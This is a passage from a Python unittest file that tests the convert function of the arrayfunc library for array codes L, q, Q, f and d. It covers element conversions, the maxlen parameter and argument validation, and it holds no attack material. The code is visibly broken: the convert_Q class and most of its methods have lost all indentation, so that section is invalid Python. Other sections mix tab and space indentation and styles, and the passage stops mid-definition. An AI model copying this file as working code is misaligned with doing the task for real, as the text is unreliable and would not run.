		"""Test convert for basic operation in array code L - Convert to array code d.
		"""
		self._checkconvert_float('d')

	########################################################
	def test_convert_ops_13(self):
		"""Test convert for basic operation in array code L - Test maxlen parameter.

		Convert only the first half of the array and verify the second half
		of the output array was left untouched.
		"""
		outputtest = 'l'
		testvals = TestData.TestLimits(self.TypeCode, outputtest)
		data = array.array(self.TypeCode, testvals)
		dataout = array.array(outputtest, itertools.repeat(0, len(data)))
		limlen = len(dataout) // 2
		# Save the second part of the output array so we can verify it is unchanged.
		originalout = dataout[limlen:]
		arrayfunc.convert(data, dataout, maxlen=limlen)
		# Only the first 'limlen' elements should have been converted.
		# (The unused 'converted' local that used to be created here was dead code.)
		for dataitem, dataoutitem in zip(data[:limlen], dataout[:limlen]):
			self.assertEqual(dataoutitem, dataitem)
		# The data past 'maxlen' should be unchanged.
		for dataitem, dataoutitem in zip(originalout, dataout[limlen:]):
			self.assertEqual(dataoutitem, dataitem)
##############################################################################
##############################################################################
class convert_params_L(unittest.TestCase):
	"""Test parameter validation of the convert function for array code 'L'.
	param_template
	"""

	########################################################
	def setUp(self):
		"""Initialise.
		"""
		self.TypeCode = 'L'
		# Zero length array used for the empty array test.
		self.zerodata = array.array(self.TypeCode, [])

	########################################################
	def test_convert_params_01(self):
		"""Test convert for parameters in array code L - Zero length array.
		"""
		dataout = array.array(self.TypeCode, itertools.repeat(0, len(self.zerodata)))
		# Converting an empty array is an error.
		with self.assertRaises(IndexError):
			arrayfunc.convert(self.zerodata, dataout)

	########################################################
	def test_convert_params_02(self):
		"""Test convert for parameters in array code L - Unequal array length.
		"""
		testvals = TestData.TestLimits(self.TypeCode, self.TypeCode)
		data = array.array(self.TypeCode, testvals)
		# The output array is deliberately shorter than the input array.
		dataout = array.array(self.TypeCode, itertools.repeat(0, len(data) // 2))
		with self.assertRaises(IndexError):
			arrayfunc.convert(data, dataout)

	########################################################
	def test_convert_params_03(self):
		"""Test convert for parameters in array code L - Invalid input array data type.
		"""
		dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
		# The input must be an array, not an integer.
		with self.assertRaises(TypeError):
			arrayfunc.convert(99, dataout)

	########################################################
	def test_convert_params_04(self):
		"""Test convert for parameters in array code L - Invalid output array data type.
		"""
		data = array.array(self.TypeCode, itertools.repeat(0, 100))
		# The output must be an array, not an integer.
		with self.assertRaises(TypeError):
			arrayfunc.convert(data, 99)

	########################################################
	def test_convert_params_05(self):
		"""Test convert for parameters in array code L - All parameters missing.
		"""
		# Calling with no arguments at all must fail.
		with self.assertRaises(TypeError):
			arrayfunc.convert()

	########################################################
	def test_convert_params_06(self):
		"""Test convert for parameters in array code L - Second parameter missing.
		"""
		data = array.array(self.TypeCode, itertools.repeat(0, 100))
		# Supply only the first parameter; the missing output array must be
		# rejected. (The original test passed no arguments at all, which
		# duplicated test_convert_params_05 instead of testing this case.)
		with self.assertRaises(TypeError):
			arrayfunc.convert(data)

	########################################################
	def test_convert_params_07(self):
		"""Test convert for parameters in array code L - Too many parameters.
		"""
		outputtest = 'b'
		testvals = TestData.TestLimits(self.TypeCode, outputtest)
		data = array.array(self.TypeCode, testvals)
		dataout = array.array(outputtest, itertools.repeat(0, len(data)))
		# An extra positional parameter must be rejected.
		with self.assertRaises(TypeError):
			arrayfunc.convert(data, dataout, 2, maxlen=500)
##############################################################################
##############################################################################
class convert_q(unittest.TestCase):
	"""Test for basic convert function for array code 'q'.
	op_template
	"""

	##############################################################################
	def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
		"""This function is patched into assertEqual to allow testing for
		the floating point special values NaN, Inf, and -Inf.
		"""
		# NaN cannot be compared using normal means.
		if math.isnan(dataoutitem) and math.isnan(expecteditem):
			pass
		# Anything else can be compared normally.
		else:
			if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
				raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))

	########################################################
	def setUp(self):
		"""Initialise.
		"""
		# Route float comparisons through FloatassertEqual so NaN and
		# approximately-equal values compare as intended.
		self.addTypeEqualityFunc(float, self.FloatassertEqual)
		self.TypeCode = 'q'

	########################################################
	def _checkconvert_int(self, outputtest):
		"""Convert to the integer array code 'outputtest' and check that each
		output element equals the corresponding input element.
		"""
		testvals = TestData.TestLimits(self.TypeCode, outputtest)
		data = array.array(self.TypeCode, testvals)
		dataout = array.array(outputtest, itertools.repeat(0, len(data)))
		arrayfunc.convert(data, dataout)
		for dataitem, dataoutitem in zip(data, dataout):
			self.assertEqual(dataoutitem, dataitem)

	########################################################
	def _checkconvert_float(self, outputtest):
		"""Convert to the floating point array code 'outputtest' and check that
		each output element equals the corresponding input element.
		"""
		testvals = TestData.TestLimits(self.TypeCode, outputtest)
		data = array.array(self.TypeCode, testvals)
		dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
		arrayfunc.convert(data, dataout)
		# Both parameters to assertEqual must be floating point in order
		# for the floating point comparison to use FloatassertEqual.
		for dataitem, dataoutitem in zip(data, dataout):
			self.assertEqual(dataoutitem, float(dataitem))

	########################################################
	def test_convert_ops_01(self):
		"""Test convert for basic operation in array code q - Convert to array code b.
		"""
		self._checkconvert_int('b')

	########################################################
	def test_convert_ops_02(self):
		"""Test convert for basic operation in array code q - Convert to array code B.
		"""
		self._checkconvert_int('B')

	########################################################
	def test_convert_ops_03(self):
		"""Test convert for basic operation in array code q - Convert to array code h.
		"""
		self._checkconvert_int('h')

	########################################################
	def test_convert_ops_04(self):
		"""Test convert for basic operation in array code q - Convert to array code H.
		"""
		self._checkconvert_int('H')

	########################################################
	def test_convert_ops_05(self):
		"""Test convert for basic operation in array code q - Convert to array code i.
		"""
		self._checkconvert_int('i')

	########################################################
	def test_convert_ops_06(self):
		"""Test convert for basic operation in array code q - Convert to array code I.
		"""
		self._checkconvert_int('I')

	########################################################
	def test_convert_ops_07(self):
		"""Test convert for basic operation in array code q - Convert to array code l.
		"""
		self._checkconvert_int('l')

	########################################################
	def test_convert_ops_08(self):
		"""Test convert for basic operation in array code q - Convert to array code L.
		"""
		self._checkconvert_int('L')

	########################################################
	def test_convert_ops_09(self):
		"""Test convert for basic operation in array code q - Convert to array code q.
		"""
		self._checkconvert_int('q')

	########################################################
	def test_convert_ops_10(self):
		"""Test convert for basic operation in array code q - Convert to array code Q.
		"""
		self._checkconvert_int('Q')

	########################################################
	def test_convert_ops_11(self):
		"""Test convert for basic operation in array code q - Convert to array code f.
		"""
		self._checkconvert_float('f')

	########################################################
	def test_convert_ops_12(self):
		"""Test convert for basic operation in array code q - Convert to array code d.
		"""
		self._checkconvert_float('d')

	########################################################
	def test_convert_ops_13(self):
		"""Test convert for basic operation in array code q - Test maxlen parameter.

		Convert only the first half of the array and verify the second half
		of the output array was left untouched.
		"""
		outputtest = 'l'
		testvals = TestData.TestLimits(self.TypeCode, outputtest)
		data = array.array(self.TypeCode, testvals)
		dataout = array.array(outputtest, itertools.repeat(0, len(data)))
		limlen = len(dataout) // 2
		# Save the second part of the output array so we can verify it is unchanged.
		originalout = dataout[limlen:]
		arrayfunc.convert(data, dataout, maxlen=limlen)
		# Only the first 'limlen' elements should have been converted.
		# (The unused 'converted' local that used to be created here was dead code.)
		for dataitem, dataoutitem in zip(data[:limlen], dataout[:limlen]):
			self.assertEqual(dataoutitem, dataitem)
		# The data past 'maxlen' should be unchanged.
		for dataitem, dataoutitem in zip(originalout, dataout[limlen:]):
			self.assertEqual(dataoutitem, dataitem)
##############################################################################
##############################################################################
class convert_params_q(unittest.TestCase):
	"""Test parameter validation of the convert function for array code 'q'.
	param_template
	"""

	########################################################
	def setUp(self):
		"""Initialise.
		"""
		self.TypeCode = 'q'
		# Zero length array used for the empty array test.
		self.zerodata = array.array(self.TypeCode, [])

	########################################################
	def test_convert_params_01(self):
		"""Test convert for parameters in array code q - Zero length array.
		"""
		dataout = array.array(self.TypeCode, itertools.repeat(0, len(self.zerodata)))
		# Converting an empty array is an error.
		with self.assertRaises(IndexError):
			arrayfunc.convert(self.zerodata, dataout)

	########################################################
	def test_convert_params_02(self):
		"""Test convert for parameters in array code q - Unequal array length.
		"""
		testvals = TestData.TestLimits(self.TypeCode, self.TypeCode)
		data = array.array(self.TypeCode, testvals)
		# The output array is deliberately shorter than the input array.
		dataout = array.array(self.TypeCode, itertools.repeat(0, len(data) // 2))
		with self.assertRaises(IndexError):
			arrayfunc.convert(data, dataout)

	########################################################
	def test_convert_params_03(self):
		"""Test convert for parameters in array code q - Invalid input array data type.
		"""
		dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
		# The input must be an array, not an integer.
		with self.assertRaises(TypeError):
			arrayfunc.convert(99, dataout)

	########################################################
	def test_convert_params_04(self):
		"""Test convert for parameters in array code q - Invalid output array data type.
		"""
		data = array.array(self.TypeCode, itertools.repeat(0, 100))
		# The output must be an array, not an integer.
		with self.assertRaises(TypeError):
			arrayfunc.convert(data, 99)

	########################################################
	def test_convert_params_05(self):
		"""Test convert for parameters in array code q - All parameters missing.
		"""
		# Calling with no arguments at all must fail.
		with self.assertRaises(TypeError):
			arrayfunc.convert()

	########################################################
	def test_convert_params_06(self):
		"""Test convert for parameters in array code q - Second parameter missing.
		"""
		data = array.array(self.TypeCode, itertools.repeat(0, 100))
		# Supply only the first parameter; the missing output array must be
		# rejected. (The original test passed no arguments at all, which
		# duplicated test_convert_params_05 instead of testing this case.)
		with self.assertRaises(TypeError):
			arrayfunc.convert(data)

	########################################################
	def test_convert_params_07(self):
		"""Test convert for parameters in array code q - Too many parameters.
		"""
		outputtest = 'b'
		testvals = TestData.TestLimits(self.TypeCode, outputtest)
		data = array.array(self.TypeCode, testvals)
		dataout = array.array(outputtest, itertools.repeat(0, len(data)))
		# An extra positional parameter must be rejected.
		with self.assertRaises(TypeError):
			arrayfunc.convert(data, dataout, 2, maxlen=500)
##############################################################################
##############################################################################
class convert_Q(unittest.TestCase):
"""Test for basic convert function.
op_template
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
self.TypeCode = 'Q'
########################################################
def test_convert_ops_01(self):
"""Test convert for basic operation in array code Q - Convert to array code b.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_02(self):
"""Test convert for basic operation in array code Q - Convert to array code B.
"""
outputtest = 'B'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_03(self):
"""Test convert for basic operation in array code Q - Convert to array code h.
"""
outputtest = 'h'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_04(self):
"""Test convert for basic operation in array code Q - Convert to array code H.
"""
outputtest = 'H'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_05(self):
"""Test convert for basic operation in array code Q - Convert to array code i.
"""
outputtest = 'i'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_06(self):
"""Test convert for basic operation in array code Q - Convert to array code I.
"""
outputtest = 'I'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_07(self):
"""Test convert for basic operation in array code Q - Convert to array code l.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_08(self):
"""Test convert for basic operation in array code Q - Convert to array code L.
"""
outputtest = 'L'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_09(self):
"""Test convert for basic operation in array code Q - Convert to array code q.
"""
outputtest = 'q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_10(self):
"""Test convert for basic operation in array code Q - Convert to array code Q.
"""
outputtest = 'Q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_11(self):
"""Test convert for basic operation in array code Q - Convert to array code f.
"""
outputtest = 'f'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_12(self):
"""Test convert for basic operation in array code Q - Convert to array code d.
"""
outputtest = 'd'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_13(self):
    """Test convert for basic operation in array code Q - Test maxlen parameter.

    Only the first 'maxlen' elements should be converted; the remainder of
    the output array must be left untouched.
    """
    outputtest = 'l'
    testvals = TestData.TestLimits(self.TypeCode, outputtest)
    data = array.array(self.TypeCode, testvals)
    dataout = array.array(outputtest, itertools.repeat(0, len(data)))
    # Convert only the first half of the array.
    limlen = len(dataout) // 2
    # Save the second part of the output array so we can verify it is unchanged.
    originalout = dataout[limlen:]
    arrayfunc.convert(data, dataout, maxlen=limlen)
    # This data should be converted.
    for dataitem, dataoutitem in zip(data[:limlen], dataout[:limlen]):
        self.assertEqual(dataoutitem, dataitem)
    # This data should be unchanged.
    for dataitem, dataoutitem in zip(originalout, dataout[limlen:]):
        self.assertEqual(dataoutitem, dataitem)
##############################################################################
##############################################################################
class convert_params_Q(unittest.TestCase):
    """Test for basic parameter function.
    param_template
    """

    ########################################################
    def setUp(self):
        """Initialise.
        """
        self.TypeCode = 'Q'
        self.zerodata = array.array(self.TypeCode, [])

    ########################################################
    def test_convert_params_01(self):
        """Test convert for parameters in array code Q - Zero length array.
        """
        dataout = array.array(self.TypeCode, itertools.repeat(0, len(self.zerodata)))
        with self.assertRaises(IndexError):
            arrayfunc.convert(self.zerodata, dataout)

    ########################################################
    def test_convert_params_02(self):
        """Test convert for parameters in array code Q - Unequal array length.
        """
        testvals = TestData.TestLimits(self.TypeCode, self.TypeCode)
        data = array.array(self.TypeCode, testvals)
        # The output array is deliberately half the length of the input.
        dataout = array.array(self.TypeCode, itertools.repeat(0, len(data) // 2))
        with self.assertRaises(IndexError):
            arrayfunc.convert(data, dataout)

    ########################################################
    def test_convert_params_03(self):
        """Test convert for parameters in array code Q - Invalid input array data type.
        """
        dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
        with self.assertRaises(TypeError):
            arrayfunc.convert(99, dataout)

    ########################################################
    def test_convert_params_04(self):
        """Test convert for parameters in array code Q - Invalid output array data type.
        """
        data = array.array(self.TypeCode, itertools.repeat(0, 100))
        with self.assertRaises(TypeError):
            arrayfunc.convert(data, 99)

    ########################################################
    def test_convert_params_05(self):
        """Test convert for parameters in array code Q - All parameters missing.
        """
        with self.assertRaises(TypeError):
            arrayfunc.convert()

    ########################################################
    def test_convert_params_06(self):
        """Test convert for parameters in array code Q - Second parameter missing.
        """
        # Bug fix: the original called convert() with no arguments at all,
        # duplicating test_convert_params_05 instead of exercising a missing
        # second parameter.
        data = array.array(self.TypeCode, itertools.repeat(0, 100))
        with self.assertRaises(TypeError):
            arrayfunc.convert(data)

    ########################################################
    def test_convert_params_07(self):
        """Test convert for parameters in array code Q - Too many parameters.
        """
        outputtest = 'b'
        testvals = TestData.TestLimits(self.TypeCode, outputtest)
        data = array.array(self.TypeCode, testvals)
        dataout = array.array(outputtest, itertools.repeat(0, len(data)))
        with self.assertRaises(TypeError):
            arrayfunc.convert(data, dataout, 2, maxlen=500)
##############################################################################
##############################################################################
class convert_f(unittest.TestCase):
    """Test for basic convert function.
    op_template
    """

    ##############################################################################
    def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
        """This function is patched into assertEqual to allow testing for
        the floating point special values NaN, Inf, and -Inf.
        """
        # NaN cannot be compared using normal means.
        if math.isnan(dataoutitem) and math.isnan(expecteditem):
            pass
        # Anything else can be compared normally.
        else:
            if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
                raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))

    ########################################################
    def setUp(self):
        """Initialise.
        """
        self.addTypeEqualityFunc(float, self.FloatassertEqual)
        self.TypeCode = 'f'

    ########################################################
    def _checkconvert_int(self, outputtest):
        """Convert to integer array code 'outputtest' and check each element.
        The templated test bodies were identical except for the array code,
        so they are factored into this helper.
        """
        testvals = TestData.TestLimits(self.TypeCode, outputtest)
        data = array.array(self.TypeCode, testvals)
        dataout = array.array(outputtest, itertools.repeat(0, len(data)))
        arrayfunc.convert(data, dataout)
        for dataitem, dataoutitem in zip(data, dataout):
            self.assertEqual(dataoutitem, dataitem)

    ########################################################
    def _checkconvert_float(self, outputtest):
        """Convert to floating point array code 'outputtest' and check each element.
        """
        testvals = TestData.TestLimits(self.TypeCode, outputtest)
        data = array.array(self.TypeCode, testvals)
        dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
        arrayfunc.convert(data, dataout)
        # Both parameters to assertEqual must be floating point in order
        # for the floating point comparison to use FloatassertEqual.
        for dataitem, dataoutitem in zip(data, dataout):
            self.assertEqual(dataoutitem, float(dataitem))

    ########################################################
    def test_convert_ops_01(self):
        """Test convert for basic operation in array code f - Convert to array code b.
        """
        self._checkconvert_int('b')

    ########################################################
    def test_convert_ops_02(self):
        """Test convert for basic operation in array code f - Convert to array code B.
        """
        self._checkconvert_int('B')

    ########################################################
    def test_convert_ops_03(self):
        """Test convert for basic operation in array code f - Convert to array code h.
        """
        self._checkconvert_int('h')

    ########################################################
    def test_convert_ops_04(self):
        """Test convert for basic operation in array code f - Convert to array code H.
        """
        self._checkconvert_int('H')

    ########################################################
    def test_convert_ops_05(self):
        """Test convert for basic operation in array code f - Convert to array code i.
        """
        self._checkconvert_int('i')

    ########################################################
    def test_convert_ops_06(self):
        """Test convert for basic operation in array code f - Convert to array code I.
        """
        self._checkconvert_int('I')

    ########################################################
    def test_convert_ops_07(self):
        """Test convert for basic operation in array code f - Convert to array code l.
        """
        self._checkconvert_int('l')

    ########################################################
    def test_convert_ops_08(self):
        """Test convert for basic operation in array code f - Convert to array code L.
        """
        self._checkconvert_int('L')

    ########################################################
    def test_convert_ops_09(self):
        """Test convert for basic operation in array code f - Convert to array code q.
        """
        self._checkconvert_int('q')

    ########################################################
    def test_convert_ops_10(self):
        """Test convert for basic operation in array code f - Convert to array code Q.
        """
        self._checkconvert_int('Q')

    ########################################################
    def test_convert_ops_11(self):
        """Test convert for basic operation in array code f - Convert to array code f.
        """
        self._checkconvert_float('f')

    ########################################################
    def test_convert_ops_12(self):
        """Test convert for basic operation in array code f - Convert to array code d.
        """
        self._checkconvert_float('d')

    ########################################################
    def test_convert_ops_13(self):
        """Test convert for basic operation in array code f - Test maxlen parameter.

        Only the first 'maxlen' elements should be converted; the remainder
        of the output array must be left untouched.
        """
        outputtest = 'l'
        testvals = TestData.TestLimits(self.TypeCode, outputtest)
        data = array.array(self.TypeCode, testvals)
        dataout = array.array(outputtest, itertools.repeat(0, len(data)))
        limlen = len(dataout) // 2
        # Save the second part of the output array so we can verify it is unchanged.
        originalout = dataout[limlen:]
        arrayfunc.convert(data, dataout, maxlen=limlen)
        # This data should be converted.
        for dataitem, dataoutitem in zip(data[:limlen], dataout[:limlen]):
            self.assertEqual(dataoutitem, dataitem)
        # This data should be unchanged.
        for dataitem, dataoutitem in zip(originalout, dataout[limlen:]):
            self.assertEqual(dataoutitem, dataitem)
##############################################################################
##############################################################################
class convert_params_f(unittest.TestCase):
    """Test for basic parameter function.
    param_template
    """

    ########################################################
    def setUp(self):
        """Initialise.
        """
        self.TypeCode = 'f'
        self.zerodata = array.array(self.TypeCode, [])

    ########################################################
    def test_convert_params_01(self):
        """Test convert for parameters in array code f - Zero length array.
        """
        dataout = array.array(self.TypeCode, itertools.repeat(0, len(self.zerodata)))
        with self.assertRaises(IndexError):
            arrayfunc.convert(self.zerodata, dataout)

    ########################################################
    def test_convert_params_02(self):
        """Test convert for parameters in array code f - Unequal array length.
        """
        testvals = TestData.TestLimits(self.TypeCode, self.TypeCode)
        data = array.array(self.TypeCode, testvals)
        # The output array is deliberately half the length of the input.
        dataout = array.array(self.TypeCode, itertools.repeat(0, len(data) // 2))
        with self.assertRaises(IndexError):
            arrayfunc.convert(data, dataout)

    ########################################################
    def test_convert_params_03(self):
        """Test convert for parameters in array code f - Invalid input array data type.
        """
        dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
        with self.assertRaises(TypeError):
            arrayfunc.convert(99, dataout)

    ########################################################
    def test_convert_params_04(self):
        """Test convert for parameters in array code f - Invalid output array data type.
        """
        data = array.array(self.TypeCode, itertools.repeat(0, 100))
        with self.assertRaises(TypeError):
            arrayfunc.convert(data, 99)

    ########################################################
    def test_convert_params_05(self):
        """Test convert for parameters in array code f - All parameters missing.
        """
        with self.assertRaises(TypeError):
            arrayfunc.convert()

    ########################################################
    def test_convert_params_06(self):
        """Test convert for parameters in array code f - Second parameter missing.
        """
        # Bug fix: the original called convert() with no arguments at all,
        # duplicating test_convert_params_05 instead of exercising a missing
        # second parameter.
        data = array.array(self.TypeCode, itertools.repeat(0, 100))
        with self.assertRaises(TypeError):
            arrayfunc.convert(data)

    ########################################################
    def test_convert_params_07(self):
        """Test convert for parameters in array code f - Too many parameters.
        """
        outputtest = 'b'
        testvals = TestData.TestLimits(self.TypeCode, outputtest)
        data = array.array(self.TypeCode, testvals)
        dataout = array.array(outputtest, itertools.repeat(0, len(data)))
        with self.assertRaises(TypeError):
            arrayfunc.convert(data, dataout, 2, maxlen=500)
##############################################################################
##############################################################################
class convert_d(unittest.TestCase):
    """Test for basic convert function.
    op_template
    """

    ##############################################################################
    def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
        """This function is patched into assertEqual to allow testing for
        the floating point special values NaN, Inf, and -Inf.
        """
        # NaN cannot be compared using normal means.
        if math.isnan(dataoutitem) and math.isnan(expecteditem):
            pass
        # Anything else can be compared normally.
        else:
            if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
                raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))

    ########################################################
    def setUp(self):
        """Initialise.
        """
        self.addTypeEqualityFunc(float, self.FloatassertEqual)
        self.TypeCode = 'd'

    ########################################################
    def _checkconvert_int(self, outputtest):
        """Convert to integer array code 'outputtest' and check each element.
        The templated test bodies were identical except for the array code,
        so they are factored into this helper.
        """
        testvals = TestData.TestLimits(self.TypeCode, outputtest)
        data = array.array(self.TypeCode, testvals)
        dataout = array.array(outputtest, itertools.repeat(0, len(data)))
        arrayfunc.convert(data, dataout)
        for dataitem, dataoutitem in zip(data, dataout):
            self.assertEqual(dataoutitem, dataitem)

    ########################################################
    def _checkconvert_float(self, outputtest):
        """Convert to floating point array code 'outputtest' and check each element.
        """
        testvals = TestData.TestLimits(self.TypeCode, outputtest)
        data = array.array(self.TypeCode, testvals)
        dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
        arrayfunc.convert(data, dataout)
        # Both parameters to assertEqual must be floating point in order
        # for the floating point comparison to use FloatassertEqual.
        for dataitem, dataoutitem in zip(data, dataout):
            self.assertEqual(dataoutitem, float(dataitem))

    ########################################################
    def test_convert_ops_01(self):
        """Test convert for basic operation in array code d - Convert to array code b.
        """
        self._checkconvert_int('b')

    ########################################################
    def test_convert_ops_02(self):
        """Test convert for basic operation in array code d - Convert to array code B.
        """
        self._checkconvert_int('B')

    ########################################################
    def test_convert_ops_03(self):
        """Test convert for basic operation in array code d - Convert to array code h.
        """
        self._checkconvert_int('h')

    ########################################################
    def test_convert_ops_04(self):
        """Test convert for basic operation in array code d - Convert to array code H.
        """
        self._checkconvert_int('H')

    ########################################################
    def test_convert_ops_05(self):
        """Test convert for basic operation in array code d - Convert to array code i.
        """
        self._checkconvert_int('i')

    ########################################################
    def test_convert_ops_06(self):
        """Test convert for basic operation in array code d - Convert to array code I.
        """
        self._checkconvert_int('I')

    ########################################################
    def test_convert_ops_07(self):
        """Test convert for basic operation in array code d - Convert to array code l.
        """
        self._checkconvert_int('l')

    ########################################################
    def test_convert_ops_08(self):
        """Test convert for basic operation in array code d - Convert to array code L.
        """
        self._checkconvert_int('L')

    ########################################################
    def test_convert_ops_09(self):
        """Test convert for basic operation in array code d - Convert to array code q.
        """
        self._checkconvert_int('q')

    ########################################################
    def test_convert_ops_10(self):
        """Test convert for basic operation in array code d - Convert to array code Q.
        """
        self._checkconvert_int('Q')

    ########################################################
    def test_convert_ops_11(self):
        """Test convert for basic operation in array code d - Convert to array code f.
        """
        self._checkconvert_float('f')

    ########################################################
    def test_convert_ops_12(self):
        """Test convert for basic operation in array code d - Convert to array code d.
        """
        self._checkconvert_float('d')

    ########################################################
    def test_convert_ops_13(self):
        """Test convert for basic operation in array code d - Test maxlen parameter.

        Only the first 'maxlen' elements should be converted; the remainder
        of the output array must be left untouched.
        """
        outputtest = 'l'
        testvals = TestData.TestLimits(self.TypeCode, outputtest)
        data = array.array(self.TypeCode, testvals)
        dataout = array.array(outputtest, itertools.repeat(0, len(data)))
        limlen = len(dataout) // 2
        # Save the second part of the output array so we can verify it is unchanged.
        originalout = dataout[limlen:]
        arrayfunc.convert(data, dataout, maxlen=limlen)
        # This data should be converted.
        for dataitem, dataoutitem in zip(data[:limlen], dataout[:limlen]):
            self.assertEqual(dataoutitem, dataitem)
        # This data should be unchanged.
        for dataitem, dataoutitem in zip(originalout, dataout[limlen:]):
            self.assertEqual(dataoutitem, dataitem)
##############################################################################
##############################################################################
class convert_params_d(unittest.TestCase):
    """Test for basic parameter function.
    param_template
    """

    ########################################################
    def setUp(self):
        """Initialise.
        """
        self.TypeCode = 'd'
        self.zerodata = array.array(self.TypeCode, [])

    ########################################################
    def test_convert_params_01(self):
        """Test convert for parameters in array code d - Zero length array.
        """
        dataout = array.array(self.TypeCode, itertools.repeat(0, len(self.zerodata)))
        with self.assertRaises(IndexError):
            arrayfunc.convert(self.zerodata, dataout)

    ########################################################
    def test_convert_params_02(self):
        """Test convert for parameters in array code d - Unequal array length.
        """
        testvals = TestData.TestLimits(self.TypeCode, self.TypeCode)
        data = array.array(self.TypeCode, testvals)
        # The output array is deliberately half the length of the input.
        dataout = array.array(self.TypeCode, itertools.repeat(0, len(data) // 2))
        with self.assertRaises(IndexError):
            arrayfunc.convert(data, dataout)

    ########################################################
    def test_convert_params_03(self):
        """Test convert for parameters in array code d - Invalid input array data type.
        """
        dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
        with self.assertRaises(TypeError):
            arrayfunc.convert(99, dataout)

    ########################################################
    def test_convert_params_04(self):
        """Test convert for parameters in array code d - Invalid output array data type.
        """
        data = array.array(self.TypeCode, itertools.repeat(0, 100))
        with self.assertRaises(TypeError):
            arrayfunc.convert(data, 99)

    ########################################################
    def test_convert_params_05(self):
        """Test convert for parameters in array code d - All parameters missing.
        """
        with self.assertRaises(TypeError):
            arrayfunc.convert()

    ########################################################
    def test_convert_params_06(self):
